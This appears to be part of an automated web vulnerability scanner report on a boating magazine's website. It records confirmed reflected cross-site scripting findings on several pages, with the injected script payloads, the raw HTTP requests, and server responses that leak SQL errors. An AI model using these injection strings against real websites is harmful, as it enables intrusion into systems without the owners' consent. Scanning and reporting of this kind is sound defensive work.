Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001FEB)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001FEB)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/mishaps-a-rescues" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Coastguard Videos, Reports, and Responses to Mariners</title> <link href="/news/mishaps-a-rescues?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/news/mishaps-a-rescues?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_cg_responses m_cg_responses"><!--
Type of page: category<br />Section: 1, s_news<br />Category: 36, c_cg_responses<br />Menu: 85, m_cg_responses-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"&g..
- /news/coastwise

/news/coastwise CONFIRMED

http://www.soundingsonline.com/news/coastwise?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001FF5)</script>

Request

GET /news/coastwise?'"--></style></script><script>netsparker(0x001FF5)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001FF5)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001FF5)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/news/coastwise" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>News Focused on Activity in our Coastal Waters</title> <link href="/news/coastwise?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/news/coastwise?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_uncategorized m_coastwise"><!--
Type of page: category<br />Section: 1, s_news<br />Category: 1, c_uncategorized<br />Menu: 115, m_coastwise-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span>..
- /boat-shop/sea-savvy

/boat-shop/sea-savvy CONFIRMED

http://www.soundingsonline.com/boat-shop/sea-savvy?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00200A)</script>

Request

GET /boat-shop/sea-savvy?'"--></style></script><script>netsparker(0x00200A)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00200A)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00200A)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/sea-savvy" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Cruising Life through the Eyes of Tom Neale</title> <link href="/boat-shop/sea-savvy?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/sea-savvy?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> 